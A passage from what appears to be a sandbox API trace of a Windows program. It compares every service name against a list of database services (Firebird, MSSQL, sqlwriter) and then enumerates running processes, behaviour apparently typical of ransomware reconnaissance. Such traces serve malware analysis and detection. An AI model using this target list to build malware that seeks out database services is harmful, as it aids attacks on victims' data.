returned 20 [0285.324] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0285.324] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0285.324] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0285.324] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0285.324] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0285.324] lstrlenW (lpString="Audiosrv") returned 8 [0285.324] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0285.324] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0285.324] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0285.324] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0285.324] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0285.324] lstrlenW (lpString="BFE") returned 3 [0285.324] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0285.324] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0285.324] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0285.324] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0285.325] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0285.325] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0285.325] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0285.325] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0285.325] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0285.325] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0285.325] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0285.325] lstrlenW (lpString="CDPSvc") returned 6 [0285.325] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0285.325] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0285.325] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0285.325] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0285.325] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0285.325] lstrlenW (lpString="ClickToRunSvc") returned 13 [0285.325] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0285.325] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0285.325] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0285.325] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0285.325] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0285.325] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0285.325] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0285.325] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0285.325] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0285.325] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0285.325] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0285.326] lstrlenW (lpString="CryptSvc") returned 8 [0285.326] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0285.326] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0285.326] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0285.326] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0285.326] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0285.326] lstrlenW (lpString="DcomLaunch") returned 10 [0285.326] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0285.326] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0285.326] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0285.326] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0285.326] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0285.326] lstrlenW (lpString="DeviceAssociationService") returned 24 [0285.326] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0285.326] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0285.326] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0285.326] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0285.326] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0285.326] lstrlenW (lpString="Dhcp") returned 4 [0285.326] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0285.326] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0285.326] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0285.326] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0285.326] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0285.326] lstrlenW (lpString="Dnscache") returned 8 [0285.326] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0285.326] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0285.327] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0285.327] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0285.327] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0285.327] lstrlenW (lpString="DPS") returned 3 [0285.327] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0285.327] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0285.327] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0285.327] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0285.327] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0285.327] lstrlenW (lpString="DusmSvc") returned 7 [0285.327] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0285.327] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0285.327] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0285.327] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0285.327] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0285.327] lstrlenW (lpString="EventLog") returned 8 [0285.327] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0285.327] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0285.327] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0285.327] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0285.327] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0285.327] lstrlenW (lpString="EventSystem") returned 11 [0285.327] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0285.327] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0285.327] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0285.327] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0285.327] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0285.327] lstrlenW (lpString="FontCache") returned 9 [0285.327] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0285.327] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0285.327] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0285.328] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0285.328] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0285.328] lstrlenW (lpString="gpsvc") returned 5 [0285.328] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0285.328] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0285.328] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0285.328] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0285.328] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0285.328] lstrlenW (lpString="iphlpsvc") returned 8 [0285.328] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0285.328] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0285.328] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0285.328] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0285.328] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0285.328] lstrlenW (lpString="KeyIso") returned 6 [0285.328] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0285.328] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0285.328] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0285.328] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0285.328] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0285.328] lstrlenW (lpString="LanmanServer") returned 12 [0285.328] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0285.328] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0285.328] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0285.328] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0285.328] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0285.328] lstrlenW (lpString="LanmanWorkstation") returned 17 [0285.328] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0285.328] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0285.328] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0285.328] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0285.328] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0285.329] lstrlenW (lpString="lfsvc") returned 5 [0285.329] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0285.329] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0285.329] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0285.329] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0285.329] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0285.329] lstrlenW (lpString="lmhosts") returned 7 [0285.329] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0285.329] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0285.329] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0285.329] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0285.329] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0285.329] lstrlenW (lpString="LSM") returned 3 [0285.329] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0285.329] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0285.329] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0285.329] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0285.329] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0285.329] lstrlenW (lpString="MpsSvc") returned 6 [0285.329] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0285.329] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0285.329] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0285.329] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0285.329] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0285.329] lstrlenW (lpString="NcbService") returned 10 [0285.329] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0285.329] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0285.329] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0285.329] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0285.329] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0285.329] lstrlenW (lpString="netprofm") returned 8 [0285.329] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0285.330] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0285.330] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0285.330] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0285.330] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0285.330] lstrlenW (lpString="NgcSvc") returned 6 [0285.330] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0285.330] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0285.330] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0285.330] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0285.330] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0285.330] lstrlenW (lpString="NlaSvc") returned 6 [0285.330] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0285.330] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0285.330] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0285.330] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0285.330] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0285.330] lstrlenW (lpString="nsi") returned 3 [0285.330] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0285.330] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0285.330] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0285.330] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0285.330] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0285.330] lstrlenW (lpString="PcaSvc") returned 6 [0285.330] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0285.330] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0285.330] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0285.330] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0285.330] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0285.330] lstrlenW (lpString="PlugPlay") returned 8 [0285.330] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0285.330] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0285.331] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0285.331] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0285.331] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0285.331] lstrlenW (lpString="Power") returned 5 [0285.331] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0285.331] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0285.331] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0285.331] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0285.331] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0285.331] lstrlenW (lpString="ProfSvc") returned 7 [0285.331] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0285.331] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0285.331] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0285.331] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0285.331] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0285.331] lstrlenW (lpString="RpcEptMapper") returned 12 [0285.331] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0285.331] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0285.331] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0285.331] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0285.331] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0285.331] lstrlenW (lpString="RpcSs") returned 5 [0285.331] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0285.331] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0285.331] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0285.331] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0285.331] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0285.331] lstrlenW (lpString="SamSs") returned 5 [0285.331] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0285.331] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0285.331] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0285.332] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0285.332] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0285.332] lstrlenW (lpString="Schedule") returned 8 [0285.332] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0285.332] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0285.332] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0285.332] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0285.332] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0285.332] lstrlenW (lpString="SecurityHealthService") returned 21 [0285.332] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0285.332] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0285.332] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0285.332] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0285.332] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0285.332] lstrlenW (lpString="SENS") returned 4 [0285.332] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0285.332] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0285.332] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0285.332] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0285.332] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0285.332] lstrlenW (lpString="ShellHWDetection") returned 16 [0285.332] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0285.332] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0285.332] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0285.332] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0285.332] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0285.332] lstrlenW (lpString="Spooler") returned 7 [0285.332] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0285.332] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0285.332] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0285.332] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0285.333] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0285.333] lstrlenW (lpString="StateRepository") returned 15 [0285.333] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0285.333] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0285.333] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0285.333] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0285.333] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0285.333] lstrlenW (lpString="SysMain") returned 7 [0285.333] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0285.333] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0285.333] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0285.333] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0285.333] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0285.333] lstrlenW (lpString="SystemEventsBroker") returned 18 [0285.333] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0285.333] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0285.333] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0285.333] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0285.333] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0285.333] lstrlenW (lpString="Themes") returned 6 [0285.333] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0285.333] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0285.333] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0285.333] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0285.333] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0285.333] lstrlenW (lpString="tiledatamodelsvc") returned 16 [0285.334] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0285.334] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0285.334] lstrcmpiW (lpString1="sqlwriter", lpString2="tiledatamodelsvc") returned -1 [0285.334] lstrcmpiW (lpString1="mssqlserver", lpString2="tiledatamodelsvc") returned -1 [0285.334] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="tiledatamodelsvc") returned -1 [0285.334] lstrlenW (lpString="TimeBrokerSvc") returned 13 [0285.334] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TimeBrokerSvc") returned -1 [0285.334] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TimeBrokerSvc") returned -1 [0285.334] lstrcmpiW (lpString1="sqlwriter", lpString2="TimeBrokerSvc") returned -1 [0285.334] lstrcmpiW (lpString1="mssqlserver", lpString2="TimeBrokerSvc") returned -1 [0285.511] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4ed8f0 | out: hHeap=0x470000) returned 1 [0285.511] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x37c [0285.519] Process32FirstW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0285.519] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0285.520] lstrlenW (lpString="System") returned 6 [0285.520] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0285.520] lstrlenW (lpString="smss.exe") returned 8 [0285.521] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x19c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0285.521] lstrlenW (lpString="csrss.exe") returned 9 [0285.521] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x19c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0285.522] lstrlenW (lpString="wininit.exe") returned 11 [0285.522] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0285.522] lstrlenW (lpString="csrss.exe") returned 9 [0285.523] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0285.523] lstrlenW (lpString="winlogon.exe") returned 12 [0285.523] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0285.524] lstrlenW (lpString="services.exe") returned 12 [0285.524] Process32NextW (in: hSnapshot=0x37c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, 